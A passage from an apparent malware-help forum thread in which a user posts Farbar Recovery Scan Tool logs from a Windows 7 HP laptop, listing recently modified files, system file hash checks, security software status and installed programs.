2014-06-01 17:54 - 2013-12-30 05:19 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\Equinet 2014
2014-06-01 17:11 - 2014-06-01 17:11 - 00053780 _____ () C:\Users\Hewlett Packard\Downloads\FRST.txt
2014-06-01 16:50 - 2014-05-27 17:06 - 00000000 ____D () C:\Users\Hewlett Packard\Downloads\FRST-OlderVersion
2014-05-31 21:06 - 2013-12-03 10:18 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\CrashDumps
2014-05-28 11:38 - 2013-06-04 13:35 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2014-05-28 11:38 - 2013-05-07 15:41 - 00000000 ___RD () C:\Users\Hewlett Packard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-05-27 19:03 - 2014-05-27 19:00 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Google
2014-05-27 19:00 - 2013-11-25 12:31 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\Google
2014-05-27 18:24 - 2014-05-27 18:24 - 00380416 _____ () C:\Users\Hewlett Packard\Downloads\9kx0sxi1.exe
2014-05-27 18:13 - 2014-05-27 18:13 - 00030075 _____ () C:\Users\Hewlett Packard\Downloads\dds.txt
2014-05-27 18:13 - 2014-05-27 18:13 - 00008131 _____ () C:\Users\Hewlett Packard\Downloads\attach.txt
2014-05-27 18:05 - 2014-05-27 18:05 - 00016141 _____ () C:\Users\Hewlett Packard\Downloads\hijackthis.log
2014-05-27 18:02 - 2013-05-07 15:40 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\VirtualStore
2014-05-27 17:59 - 2014-05-27 17:58 - 00688992 ____R (Swearware) C:\Users\Hewlett Packard\Downloads\dds.scr
2014-05-27 17:56 - 2014-05-27 17:56 - 00388608 _____ (Trend Micro Inc.) C:\Users\Hewlett Packard\Downloads\HijackThis.exe
2014-05-27 17:14 - 2009-07-14 11:20 - 00000000 ____D () C:\Windows\system32\NDF
2014-05-27 17:09 - 2014-05-27 17:09 - 00062571 _____ () C:\Users\Hewlett Packard\Downloads\Shortcut.txt
2014-05-27 17:09 - 2014-05-25 07:01 - 00031358 _____ () C:\Users\Hewlett Packard\Downloads\Addition.txt
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\Ralph Walker\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\Public\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\hedev\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\dub_cm_auto\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\Default\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\Default User\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 12:35 - 00000000 ____D () C:\Qoobox
2014-05-27 13:05 - 2014-04-23 09:28 - 00000000 ____D () C:\Users\dub_cm_auto
2014-05-27 13:05 - 2013-12-16 21:26 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\Apps\2.0
2014-05-27 13:05 - 2012-03-03 10:14 - 00000000 ____D () C:\Users\Ralph Walker
2014-05-27 13:04 - 2014-05-27 13:04 - 00033698 _____ () C:\ComboFix.txt
2014-05-27 12:59 - 2014-05-27 12:35 - 00000000 ____D () C:\Windows\erdnt
2014-05-27 12:47 - 2009-07-14 10:34 - 00000215 _____ () C:\Windows\system.ini
2014-05-27 12:28 - 2014-05-27 12:28 - 05200919 ____R (Swearware) C:\Users\Hewlett Packard\Downloads\username123.exe
2014-05-27 12:22 - 2014-05-27 12:22 - 01327971 _____ () C:\Users\Hewlett Packard\Downloads\adwcleaner_3.211.exe
2014-05-27 09:49 - 2014-05-27 09:49 - 00007606 _____ () C:\Users\Hewlett Packard\AppData\Local\Resmon.ResmonCfg
2014-05-27 09:31 - 2014-05-25 05:44 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\NPE
2014-05-27 09:29 - 2014-05-25 05:46 - 00000000 ____D () C:\NPE
2014-05-27 03:19 - 2013-06-04 13:41 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\Adobe
2014-05-27 00:17 - 2013-05-31 13:28 - 00692400 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-05-27 00:17 - 2013-05-31 13:28 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-05-27 00:17 - 2011-11-10 07:56 - 00070832 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-05-26 23:34 - 2014-05-26 23:34 - 00000632 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233429.reg
2014-05-26 23:34 - 2014-05-26 23:34 - 00000632 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233404.reg
2014-05-26 23:33 - 2014-05-26 23:33 - 00012436 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233313.reg
2014-05-26 23:32 - 2014-05-26 23:31 - 00046014 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233124.reg
2014-05-26 10:07 - 2014-05-25 04:13 - 00003702 _____ () C:\Windows\System32\Tasks\RegWrite
2014-05-26 01:24 - 2013-12-02 03:31 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\vlc
2014-05-25 20:13 - 2014-05-25 20:12 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\SkyCable
2014-05-25 19:15 - 2013-11-27 11:40 - 00000000 ____D () C:\Users\Hewlett Packard\Documents\samsung
2014-05-25 18:58 - 2014-05-25 18:58 - 00000000 ____D () C:\Users\Hewlett Packard\Documents\SelfMV
2014-05-25 07:19 - 2014-05-25 07:19 - 00002606 _____ () C:\Users\Hewlett Packard\Downloads\Rkill.txt
2014-05-25 06:55 - 2014-05-25 06:55 - 01940216 _____ (Bleeping Computer, LLC) C:\Users\Hewlett Packard\Downloads\rkill.exe
2014-05-25 06:11 - 2013-05-07 15:40 - 00000000 ____D () C:\Users\Hewlett Packard
2014-05-25 05:45 - 2012-04-06 01:53 - 00000000 ____D () C:\ProgramData\Norton
2014-05-25 05:14 - 2014-05-25 05:14 - 00041926 _____ () C:\Users\Hewlett Packard\Documents\cc_20140525_051401.reg
2014-05-25 03:27 - 2013-12-02 03:31 - 00000258 __RSH () C:\Users\Hewlett Packard\ntuser.pol
2014-05-23 19:22 - 2014-05-23 18:58 - 17917592 _____ () C:\Users\Hewlett Packard\Desktop\Overall Presentation - Retirement.pptx
2014-05-23 19:09 - 2014-05-23 18:57 - 09242974 _____ () C:\Users\Hewlett Packard\Desktop\Overall Presentation - Prospective Properties.pptx
2014-05-23 12:48 - 2013-11-25 12:33 - 00002183 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-05-21 09:06 - 2013-05-07 15:45 - 00000000 ____D () C:\Users\Hewlett Packard\Documents\Youcam
2014-05-21 08:30 - 2014-05-21 08:30 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Blue Jeans
2014-05-20 00:56 - 2013-12-30 05:17 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\Personal 2014
2014-05-17 07:15 - 2013-05-07 15:41 - 00000000 ___RD () C:\Users\Hewlett Packard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools
2014-05-17 03:31 - 2014-05-07 09:22 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-05-17 03:15 - 2013-05-13 14:23 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-05-17 03:07 - 2013-08-14 18:03 - 00000000 ____D () C:\Windows\system32\MRT
2014-05-17 03:03 - 2013-05-08 11:23 - 93223848 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-05-16 23:20 - 2014-05-16 23:20 - 00000000 ____D () C:\Windows\System32\Tasks\Norton Internet Security
2014-05-16 23:18 - 2014-01-17 11:42 - 00002019 _____ () C:\Users\Public\Desktop\Adobe Reader X.lnk
2014-05-16 23:18 - 2011-11-10 08:07 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader X.lnk
2014-05-16 23:15 - 2013-11-25 12:17 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Internet Security
2014-05-16 23:15 - 2013-05-07 15:41 - 00002501 _____ () C:\Users\Public\Desktop\Norton Internet Security.lnk
2014-05-16 23:15 - 2012-04-06 01:53 - 00003234 _____ () C:\Windows\System32\Tasks\Norton WSC Integration
2014-05-16 23:15 - 2012-04-06 01:53 - 00000000 ____D () C:\Windows\system32\Drivers\NISx64
2014-05-12 07:26 - 2014-06-02 08:35 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-05-12 07:26 - 2014-06-02 08:35 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-05-12 07:25 - 2014-06-02 08:35 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-05-11 11:36 - 2013-11-25 12:31 - 00003912 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-05-11 11:36 - 2013-11-25 12:31 - 00003660 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-05-09 15:35 - 2014-05-09 15:35 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Oracle
2014-05-09 15:35 - 2014-05-09 15:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-05-09 15:35 - 2013-10-22 10:14 - 00000000 ____D () C:\ProgramData\Oracle
2014-05-09 15:35 - 2013-09-05 18:21 - 00000000 ____D () C:\Program Files (x86)\Java
2014-05-09 14:14 - 2014-05-15 15:04 - 00477184 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-05-09 14:11 - 2014-05-15 15:04 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-05-07 22:56 - 2013-10-09 17:56 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\Aeden
2014-05-06 12:40 - 2014-05-17 03:14 - 23544320 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-05-06 12:17 - 2014-05-17 03:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-05-06 11:25 - 2014-05-17 03:14 - 17382912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-05-06 11:07 - 2014-05-17 03:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-05-06 11:00 - 2014-05-17 03:14 - 00084992 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-05-06 10:10 - 2014-05-17 03:14 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-05-05 16:55 - 2014-05-05 16:55 - 00000031 _____ () C:\Users\Hewlett Packard\Desktop\dvr password.txt
2014-05-05 16:52 - 2014-05-05 16:50 - 00000000 ____D () C:\Program Files (x86)\DVRClient Plug-in
2014-05-05 16:50 - 2014-05-05 16:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DVRClient Plug-in

Some content of TEMP:
====================
C:\Users\Hewlett Packard\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpa1ew1g.dll

==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit

LastRegBack: 2014-05-29 00:26

==================== End Of Log ============================


----------



## raphael100 (May 24, 2014)

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-06-2014
Ran by Hewlett Packard at 2014-06-04 19:19:59
Running from C:\Users\Hewlett Packard\Desktop
Boot Mode: Normal
==========================================================

==================== Security Center ========================

AV: Norton Internet Security (Enabled - Up to date) {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
AS: Norton Internet Security (Enabled - Up to date) {631E4324-D31C-783F-EC5C-35AD42B18466}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Norton Internet Security (Enabled) {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}

==================== Installed Programs ======================

Adobe Flash Player 13 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 13.0.0.214 - Adobe Systems Incorporated)
Adobe Reader X (10.1.10) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.10 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.6 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.6.1.629 - Adobe Systems, Inc.)
AuthenTec TrueAPI (Version: 1.3.0.144 - AuthenTec, Inc.) Hidden
Bejeweled 3 (x32 Version: 2.2.0.97 - WildTangent) Hidden
bjnplugin (HKLM-x32\...\{0739BA9B-B652-400A-AEAF-A0A603B42849}) (Version: 2.6.118.8 - Blue Jeans)
Blackhawk Striker 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Broadcom 802.11 Wireless LAN Adapter (HKLM\...\Broadcom 802.11 Wireless LAN Adapter) (Version: - Broadcom Corporation)
Broadcom Bluetooth Software (HKLM\...\{6E7F4CA3-B2DE-413C-A7A1-43AA5BE19EA1}) (Version: 6.5.0.2300 - Broadcom Corporation)
Broadcom InConcert Maestro (HKLM\...\{57DD35E9-D9BB-4089-BB05-EF933C586CB3}) (Version: 1.0.5.2300 - Broadcom Corporation)
CCleaner (HKLM\...\CCleaner) (Version: 4.14 - Piriform)
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Cradle of Rome 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.5.0.4606 - CyberLink Corp.)
CyberLink YouCam (x32 Version: 3.5.0.4606 - CyberLink Corp.) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{349F73CA-653A-43A6-AE77-970B07D6EDA0}) (Version: - Microsoft)
Dora's World Adventure (x32 Version: 2.2.0.95 - WildTangent) Hidden
Dropbox (HKCU\...\Dropbox) (Version: 2.8.2 - Dropbox, Inc.)
DVRClientPlugin 1.3 (HKLM-x32\...\DVRClientPlugin) (Version: 1.3 - )
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version: - )
ESU for Microsoft Windows 7 SP1 (HKLM-x32\...\{E1311ACE-E2BB-41BC-A02C-7256E11E3A33}) (Version: 3.1.4 - Hewlett-Packard)
Evernote v. 4.2.3 (HKLM-x32\...\{F761359C-9CED-45AE-9A51-9D6605CD55C4}) (Version: 4.2.3.22 - Evernote Corp.)
Farm Frenzy (x32 Version: 2.2.0.98 - WildTangent) Hidden
Farmscapes (x32 Version: 2.2.0.98 - WildTangent) Hidden
FATE (x32 Version: 2.2.0.97 - WildTangent) Hidden
Final Drive Fury (x32 Version: 2.2.0.95 - WildTangent) Hidden
Fresco Logic USB3.0 Host Controller (HKLM\...\{95CB030D-1F2B-43F8-990D-C98837713164}) (Version: 3.5.93.0 - Fresco Logic Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 35.0.1916.114 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.24.7 - Google Inc.) Hidden
Hewlett-Packard ACLM.NET v1.2.1.1 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
Hightail for Outlook 3.1.0.2128 (HKLM\...\{32DC76CA-13F7-4DE8-89BB-3F84E8EBA5C4}) (Version: 3.10.2128 - Hightail)
Hoyle Card Games (x32 Version: 2.2.0.95 - WildTangent) Hidden
HP Auto (Version: 1.0.12935.3667 - Hewlett-Packard Company) Hidden
HP Client Services (Version: 1.1.12938.3539 - Hewlett-Packard) Hidden
HP CoolSense (HKLM-x32\...\{11AF9A96-6D83-4C3B-8DCB-16EA2A358E3F}) (Version: 2.10.51 - Hewlett-Packard Company)
HP Customer Experience Enhancements (x32 Version: 6.0.1.8 - Hewlett-Packard) Hidden
HP Documentation (HKLM-x32\...\{00C14B63-9D12-4301-87AD-19D1D8E3C5D3}) (Version: 1.1.0.0 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.2.5 - WildTangent)
HP Launch Box (HKLM\...\{BF1E75D0-E7AF-4BEA-9FBC-567F0C54BDF9}) (Version: 1.0.12 - Hewlett-Packard Company)
HP On Screen Display (HKLM-x32\...\{ED1BD69A-07E3-418C-91F1-D856582581BF}) (Version: 1.3.5 - Hewlett-Packard Company)
HP Power Manager (HKLM-x32\...\{7E799992-5DA0-4A1A-9443-B1836B063FEC}) (Version: 1.4.8 - Hewlett-Packard Company)
HP Quick Launch (HKLM-x32\...\{53B17A98-5BF0-40BC-AAFF-850A357975AC}) (Version: 2.7.2 - Hewlett-Packard Company)
HP Recovery Manager (x32 Version: 2.0.0 - Hewlett-Packard) Hidden
HP Security Assistant (HKLM\...\{288591DE-4151-4E8E-A698-C6EFF5DF00F9}) (Version: 2.0.1 - Hewlett-Packard)
HP Setup (HKLM-x32\...\{F5E7D9AF-60F6-4A30-87E3-4EA94D322CE1}) (Version: 9.0.15109.3899 - Hewlett-Packard Company)
HP Setup Manager (HKLM-x32\...\{AE856388-AFAD-4753-81DF-D96B19D0A17C}) (Version: 1.2.14901.3869 - Hewlett-Packard Company)
HP SimplePass PE 2012 (HKLM-x32\...\{423FBEB8-21C6-4720-A8DA-B19B06FDB607}) (Version: 5.3.1.7 - Hewlett-Packard)
HP Software Framework (HKLM-x32\...\{1DFA0C99-6E2E-46F4-B242-51C7CF41DDE5}) (Version: 4.5.12.1 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{EE202411-2C26-49E8-9784-1BC1DBF7DE96}) (Version: 7.0.39.15 - Hewlett-Packard Company)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6368.0 - IDT)
Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation)
Intel(R) Identity Protection Technology 1.1.2.0 (HKLM-x32\...\{C01A86F5-56E7-101F-9BC9-E3F1025EB779}) (Version: 1.1.2.0 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2509 - Intel Corporation)
Intel(R) Rapid Start Technology (HKLM-x32\...\3D073343-CEEB-4ce7-85AC-A69A7631B5D6) (Version: 1.0.0.1008 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.6.2.1001 - Intel Corporation)
Java 7 Update 55 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217025FF}) (Version: 7.0.550 - Oracle)
Java Auto Updater (x32 Version: 2.1.9.8 - Sun Microsystems, Inc.) Hidden
Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Jewel Quest Mysteries: The Seventh Gate Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
John Deere Drive Green (x32 Version: 2.2.0.95 - WildTangent) Hidden
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Letters from Nowhere 2 (x32 Version: 2.2.0.97 - WildTangent) Hidden
Luxor HD (x32 Version: 2.2.0.98 - WildTangent) Hidden
Mah Jong Medley (x32 Version: 2.2.0.95 - WildTangent) Hidden
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Office Access MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Click-to-Run 2010 (Version: 14.0.4763.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Home and Business 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office Office 64-bit Components 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Single Image 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30214.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT_amd64 (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MyFreeCodec (HKCU\...\MyFreeCodec) (Version: - )
Norton Internet Security (HKLM-x32\...\NIS) (Version: 21.3.0.12 - Symantec Corporation)
Norton Management (HKLM-x32\...\MCLIENT) (Version: 3.2.2.12 - Symantec Corporation)
opensource (x32 Version: 1.0.14960.3876 - Your Company Name) Hidden
Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden
Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidden
PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
Poker Superstars III (x32 Version: 2.2.0.95 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.98 - WildTangent) Hidden
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.47.714.2011 - Realtek)
Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.1.7601.85 - Realtek Semiconductor Corp.)
RollerCoaster Tycoon 3: Platinum (x32 Version: 2.2.0.98 - WildTangent) Hidden
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.14055.3 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.14055.3 - Samsung Electronics Co., Ltd.) Hidden
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.43.0 - SAMSUNG Electronics Co., Ltd.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (x32 Version: - Microsoft) Hidden
Skype Click to Call (HKLM-x32\...\{BB285C9F-C821-4770-8970-56C4AB52C87E}) (Version: 7.2.15747.10003 - Microsoft Corporation)
Skype 6.14 (HKLM-x32\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.14.104 - Skype Technologies S.A.)
SMART BRO (HKLM-x32\...\{A9E5EDA7-2E6C-49E7-924B-A32B89C24A04}) (Version: 1.0.0.1 - ZTE)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics ClickPad Driver (HKLM\...\SynTPDeinstKey) (Version: 15.3.29.0 - Synaptics Incorporated)
The Treasures of Mystery Island: The Ghost Ship (x32 Version: 2.2.0.98 - WildTangent) Hidden
Torchlight (x32 Version: 2.2.0.98 - WildTangent) Hidden
Update for Microsoft Access 2010 (KB2553446) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B4A38370-2ADB-46B0-A1B0-0C4A2F7DCA31}) (Version: - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{302A8FE3-EBF5-486C-A431-16A1CD914443}) (Version: - Microsoft)
